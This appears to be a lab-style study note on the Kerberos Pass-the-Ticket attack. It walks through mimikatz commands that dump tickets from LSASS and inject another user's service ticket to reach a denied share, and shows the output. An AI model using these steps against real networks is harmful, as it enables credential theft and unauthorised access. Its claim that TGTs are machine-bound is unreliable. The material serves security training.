Pass-the-Ticket

The Pass-the-Ticket (PtT) attack exploits Kerberos TGS to impersonate users and access resources across a network. Unlike the TGT, which is machine-bound, TGS can be extracted from memory and re-injected into another session. If TGS tickets belong to the current user, no administrative privileges are needed. This allows attackers to bypass standard access controls by injecting valid Kerberos tickets into their own session.

• TGT vs TGS: TGT tickets are used to request service tickets from the KDC and are valid only on the machine they were generated on, while TGS tickets are for accessing specific services and can be reused across machines if extracted.

• Attack Premise: Reuse another user's TGS by extracting it from LSASS memory and injecting it into the current session. Does not require local admin rights if using the current user’s own tickets.

In our scenario, dave has privileged access to the backup folder on WEB04, but the compromised user, jen, does not.

# Check jen's permissions
> whoami
corp\jen
> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.

First, we want first to extract all tickets from LSASS. mimikatz will dump them all to .kirbi files.

# Dump tickets from LSASS
privilege::debug
sekurlsa::tickets /export
...
Saved to file [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

We can inspect the dumped ticket files and confirm that a TGS for dave accessing web04 exists.

> dir *.kirbi
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
...

We can then inject dave's WEB04 TGS into jen's session in order to access the backup folder.

# Inject dave's TGS into jen's session
mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

# List the cached tickets
> klist
...
Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

# Confirm access
> ls \\web04\backup
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt